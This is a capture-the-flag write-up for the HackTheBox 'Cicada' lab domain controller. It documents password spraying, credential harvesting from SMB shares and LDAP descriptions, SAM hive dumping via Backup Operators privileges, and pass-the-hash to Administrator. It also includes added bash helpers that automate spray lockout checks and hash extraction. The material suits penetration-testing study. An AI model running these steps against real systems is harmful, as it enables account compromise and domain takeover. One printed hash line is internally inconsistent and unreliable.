![[Cicada.png]]

# Reconnaissance

Started off with an Nmap scan and specified the following options:

- `-sC` to use default scripts
- `-sV` to gather service/version information
- `-oA` to save the output to a file (all three output formats)
- `-p-` to scan all TCP ports

The scan results suggest that the host is Windows-based, and the mix of services is the classic domain controller profile: DNS on TCP port 53, Kerberos on TCP port 88, LDAP/LDAPS on TCP ports 389/636 (plus the Global Catalog on 3268/3269), and SMB on TCP ports 139 and 445. The LDAP banner and the TLS certificate give away the domain (`cicada.htb`) and the hostname (`CICADA-DC`). Finally, WinRM is also listening on TCP port 5985. Two details from the host scripts are worth noting for later: SMB signing is enabled and required, which rules out NTLM relay to this host, and the clock skew is about seven hours, which will break Kerberos authentication from the attacking machine unless the local clock is adjusted.

```bash
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ sudo nmap -sC -sV -oA nmap/full.tcp -p- 10.129.82.46
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-22 14:01 CST
Nmap scan report for 10.129.82.46
Host is up (0.0080s latency).
Not shown: 65524 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-23 03:03:41Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
|   date: 2024-11-23T03:04:24
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 231.74 seconds
```

# Initial Access

## Abusing Null Sessions and Poor Password Policies

To gather more information about the system, I ran `enum4linux` against the host. The results revealed that the system accepts null sessions, but RPC queries for users and groups were denied.
Considering that, it was time to pivot to shares and enumerate those. Two non-standard shares, `DEV` and `HR`, looked promising, but only `HR` could have its contents listed. That share held a single, rather interesting text document.

```bash
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ enum4linux -A 10.129.82.46

┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ smbclient --no-pass -L 10.129.82.46

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	DEV             Disk
	HR              Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.82.46 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ smbclient --no-pass //10.129.82.46/DEV
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit

┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ smbclient --no-pass //10.129.82.46/HR
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 07:29:09 2024
  ..                                  D        0  Thu Mar 14 07:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 12:31:48 2024

		4168447 blocks of size 4096. 430240 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (35.3 KiloBytes/sec) (average 35.3 KiloBytes/sec)
smb: \> exit
```

The text document describes the company's onboarding process and gives new employees a default password for their first login. And like any good company with proper security protocols, it directs them to change that password to something unique after logging in for the first time.
Indeed, all the employees followed the directions, so a password-spraying attack would not work. Or would it? I generated a list of usernames by RID brute-forcing via `netexec` (possible here because the `guest` account is enabled) and kept only the `SidTypeUser` entries. Before spraying a single password across every account, it is worth checking the lockout policy (`netexec smb <host> -u guest -p '' --pass-pol`) so that one round cannot lock anybody out. With a password and a list of usernames, it was time to spray and pray. Just like that, I discovered valid user credentials.

I did not know what type of access `michael.wrightson` had, so it was time to go back to the enumeration phase and see what new information could be gathered with an authenticated session. Fortunately, `michael.wrightson` can query users and groups via RPC, and the description field of `david.orelious` contains his password, just in case he forgets it. I enumerated the system again with `david.orelious`'s credentials. It turns out he has access to the `DEV` share, which holds a PowerShell backup script with hard-coded credentials for `emily.oscars`.

```bash
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ netexec smb 10.129.82.46 -u guest -p '' --rid-brute | egrep "SidTypeUser"
SMB         10.129.82.46    445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.82.46    445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.82.46    445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.82.46    445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.82.46    445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.82.46    445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.82.46    445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.82.46    445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.82.46    445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ netexec smb 10.129.82.46 -u guest -p '' --rid-brute | egrep "SidTypeUser" \
> | cut -d '\' -f2 | cut -d '(' -f1
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ netexec smb 10.129.82.46 -d CICADA -p pw.txt -u users.txt | egrep '\+' | cut -d ":" -f1
SMB         10.129.82.46    445    CICADA-DC        [+] CICADA\michael.wrightson

┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ enum4linux -A -u michael.wrightson -p $(cat pw.txt) 10.129.82.46

┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ enum4linux -A -u david.orelious -p $(cat pw.txt) 10.129.82.46

┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ smbclient -U CICADA/david.orelious%"$(cat pw.txt)" //10.129.82.46/Dev
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 07:31:39 2024
  ..                                  D        0  Thu Mar 14 07:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 12:28:22 2024

		4168447 blocks of size 4096. 427257 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (17.3 KiloBytes/sec) (average 17.3 KiloBytes/sec)
smb: \> exit
```

Based on the backup script, I assumed `emily.oscars` is a system administrator. System administrators regularly need to reach remote hosts, and while there are many tools for that, Windows ships a native one: PowerShell remoting, which runs over WinRM. The initial enumeration showed the WinRM service listening on TCP port 5985, so with the credentials from the PowerShell script it was possible to get code execution on the target.
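The RID brute-force, lockout check and spray steps above were done with one-liners and a hand-edited `pw.txt`. As an added example (my code, not part of the original writeup), the functions below turn the same `netexec` output into a username list, read the lockout threshold out of `--pass-pol` output, derive a safe number of passwords per round, and pull the valid hits out of a spray run without echoing the password. All `SAMPLE_*` strings are constructed to mimic netexec's line layout with invented hosts, users and values; the assumption that netexec prints `None` for a disabled lockout threshold is mine.

```bash
#!/usr/bin/env bash
# Added example (my code, not part of the original writeup): post-process netexec
# output into spray inputs and check the lockout policy before spraying.
# Every SAMPLE_* string below is constructed to mimic netexec's line layout;
# the host, users, password and policy values are invented.
set -u

# Constructed: `netexec smb <dc> -u guest -p '' --rid-brute`
SAMPLE_RID='SMB  10.0.0.5  445  DC01  [+] DOMAIN\guest:
SMB  10.0.0.5  445  DC01  500: DOMAIN\Administrator (SidTypeUser)
SMB  10.0.0.5  445  DC01  512: DOMAIN\Domain Admins (SidTypeGroup)
SMB  10.0.0.5  445  DC01  1000: DOMAIN\DC01$ (SidTypeUser)
SMB  10.0.0.5  445  DC01  1104: DOMAIN\john.smoulder (SidTypeUser)
SMB  10.0.0.5  445  DC01  1106: DOMAIN\michael.wrightson (SidTypeUser)'

# Constructed: `netexec smb <dc> -u <user> -p <pw> --pass-pol`. The label text is
# what netexec prints (assumption: "None" when lockout is disabled); values invented.
SAMPLE_POL='SMB  10.0.0.5  445  DC01  [+] Dumping password info for domain: DOMAIN
SMB  10.0.0.5  445  DC01  Minimum password length: 7
SMB  10.0.0.5  445  DC01  Account Lockout Threshold: 5
SMB  10.0.0.5  445  DC01  Reset Account Lockout Counter: 30 minutes'

# Constructed: one spray round, `netexec smb <dc> -u users.txt -p pw.txt`
SAMPLE_SPRAY='SMB  10.0.0.5  445  DC01  [-] DOMAIN\Administrator:Welcome2024! STATUS_LOGON_FAILURE
SMB  10.0.0.5  445  DC01  [+] DOMAIN\michael.wrightson:Welcome2024!
SMB  10.0.0.5  445  DC01  [-] DOMAIN\john.smoulder:Welcome2024! STATUS_ACCOUNT_LOCKED_OUT'

# stdin: --rid-brute output. Prints one account name per line for SidTypeUser rows
# only (groups and aliases are dropped), without the DOMAIN\ prefix, and skips
# machine accounts (trailing $), which never carry the human default password.
rid_brute_users() {
    sed -n 's/.*: [^\\]*\\\(.*\) (SidTypeUser).*/\1/p' | grep -v '\$$'
}

# stdin: --pass-pol output. Prints the lockout threshold as an integer; 0 means
# lockout is disabled. Fails loudly on anything it cannot parse rather than guessing.
lockout_threshold() {
    local v
    v=$(sed -n 's/.*Account Lockout Threshold: *\(.*\)/\1/p' | tr -d '[:space:]')
    case "$v" in
        '')        echo "no 'Account Lockout Threshold' line found" >&2; return 1 ;;
        None|none) echo 0 ;;
        *[!0-9]*)  echo "unparseable lockout threshold: '$v'" >&2; return 1 ;;
        *)         echo "$v" ;;
    esac
}

# How many passwords may be tried per account in one round: stay at least one
# below the threshold so a user's own failed logins do not tip the account over.
spray_budget() {
    local threshold=$1
    if [ "$threshold" -eq 0 ]; then echo unlimited; else echo $(( threshold - 1 )); fi
}

# stdin: spray output. Prints DOMAIN\user for each [+] line, without the
# password, so the result is safe to paste into notes or a report.
spray_hits() {
    sed -n 's/.*\[+\] \([^:]*\):.*/\1/p'
}

# stdin: spray output. Number of accounts reported locked out; anything above 0
# is the signal to stop spraying and wait for the reset window.
spray_lockouts() {
    grep -c 'STATUS_ACCOUNT_LOCKED_OUT' || true
}

demo() {
    local t
    echo "users:";  printf '%s\n' "$SAMPLE_RID" | rid_brute_users
    t=$(printf '%s\n' "$SAMPLE_POL" | lockout_threshold)
    echo "lockout threshold: $t, passwords per round: $(spray_budget "$t")"
    echo "hits:";   printf '%s\n' "$SAMPLE_SPRAY" | spray_hits
    echo "lockouts: $(printf '%s\n' "$SAMPLE_SPRAY" | spray_lockouts)"
}
demo
```

In practice the functions read real output, for example `netexec smb 10.129.82.46 -u guest -p '' --rid-brute | rid_brute_users > users.txt`; the point of `spray_lockouts` is that a non-zero count after a round means the policy was misread and spraying must stop until the counter resets.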
```bash
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ evil-winrm -i 10.129.82.46 -u emily.oscars -p $(cat pw.txt)

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> hostname
CICADA-DC
```

# Privilege Escalation

## Abusing Group Membership Permissions

With a foothold established on the target system, I started to gain some situational awareness. `whoami /all` shows that `emily.oscars` is a member of an interesting built-in group, `BUILTIN\Backup Operators`, and that the two privileges that come with it, `SeBackupPrivilege` and `SeRestorePrivilege`, are already enabled in the token.

```powershell
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
...SNIP...

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
...SNIP...
```

Membership in `BUILTIN\Backup Operators` grants `SeBackupPrivilege`, and with that privilege enabled a process can open any file on the host for reading with backup semantics, regardless of its ACL. `reg save` honours the privilege, so it is possible to back up the `SAM` and `SYSTEM` hives and extract the local account hashes offline. (On a domain controller the `SAM` holds only the local accounts; the domain accounts themselves live in `NTDS.dit`. Here the local `Administrator` hash turned out to be enough.)

```powershell
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir


    Directory: C:\Users\emily.oscars.CICADA\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/23/2024   2:21 AM          49152 sam
-a----        11/23/2024   2:21 AM       18558976 system


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam

Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam

Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system

Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system

Info: Download successful!
```

With the hives on the attacking machine, `pypykatz` decrypts the `SAM` using the boot key from `SYSTEM`. The NT half of the local `Administrator`'s hash is all that is needed to pass the hash over WinRM (NTLM authentication) and land an administrative shell.

```bash
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ ls -latr sam system
-rw-r--r-- 1 htb-mp-1386836 htb-mp-1386836    49152 Nov 22 21:21 sam
-rw-r--r-- 1 htb-mp-1386836 htb-mp-1386836 18558976 Nov 22 21:22 system

┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ pypykatz registry --sam sam system
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied!
Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::

┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ evil-winrm -i 10.129.82.46 -u administrator -H $(cat admin_hash.txt)

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
```

# References

- [Windows Server: Service Overview and Network Port Requirements](https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/service-overview-and-network-port-requirements)
- [Backup Operator Privilege Escalation](https://www.bordergate.co.uk/backup-operator-privilege-escalation/)
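One step in the privilege-escalation section above is done by hand: copying the NT hash out of the `pypykatz` dump into `admin_hash.txt` for `evil-winrm -H`. As an added example (my code, not part of the original writeup), the functions below pull the NT field out of a `user:rid:lm:nt:::` dump line and refuse the two well-known empty-password sentinels before they end up on a command line, which is the check a practitioner wants when a dump looks too short or too regular. The dump lines and the `Administrator` hash value are constructed; the function names are mine.

```bash
#!/usr/bin/env bash
# Added example (my code, not part of the original writeup): select and validate
# an NT hash from a SAM dump before passing it to evil-winrm -H. The SAMPLE_DUMP
# lines are constructed; the Administrator hash below is invented, the other two
# are the well-known empty-password values.
set -u

EMPTY_LM='aad3b435b51404eeaad3b435b51404ee'   # LM hash of an empty password (LM storage disabled)
EMPTY_NT='31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of an empty password

# Constructed dump in the usual user:rid:lm:nt::: layout (pypykatz / secretsdump style).
SAMPLE_DUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::'

# nt_hash USER   (dump on stdin)
# Prints the lower-case NT hash for USER, or fails with a reason on stderr:
#   1 no such user, 2 malformed field, 3 empty password, 4 NT field is the LM sentinel
nt_hash() {
    local user=$1 nt
    nt=$(awk -F: -v u="$user" 'tolower($1) == tolower(u) { print tolower($4); exit }')
    [ -n "$nt" ] || { echo "no entry for $user" >&2; return 1; }
    printf '%s' "$nt" | grep -Eq '^[0-9a-f]{32}$' \
        || { echo "malformed NT hash for $user: '$nt'" >&2; return 2; }
    [ "$nt" != "$EMPTY_NT" ] \
        || { echo "$user has an empty password; log in with an empty password, not -H" >&2; return 3; }
    [ "$nt" != "$EMPTY_LM" ] \
        || { echo "NT field for $user holds the empty-LM sentinel; re-check the dump" >&2; return 4; }
    printf '%s\n' "$nt"
}

# pth_cmd HOST USER   (dump on stdin)
# Prints the evil-winrm pass-the-hash command line with the validated hash filled in.
pth_cmd() {
    local host=$1 user=$2 nt
    nt=$(nt_hash "$user") || return $?
    printf 'evil-winrm -i %s -u %s -H %s\n' "$host" "$user" "$nt"
}

demo() {
    printf '%s\n' "$SAMPLE_DUMP" | pth_cmd 10.0.0.5 Administrator
    printf '%s\n' "$SAMPLE_DUMP" | pth_cmd 10.0.0.5 Guest || echo "refused (exit $?)"
}
demo
```

Usage against a real dump is `pypykatz registry --sam sam system | pth_cmd 10.129.82.46 Administrator`; the function prints the command rather than running it so the hash can be eyeballed before any authentication attempt is logged on the target.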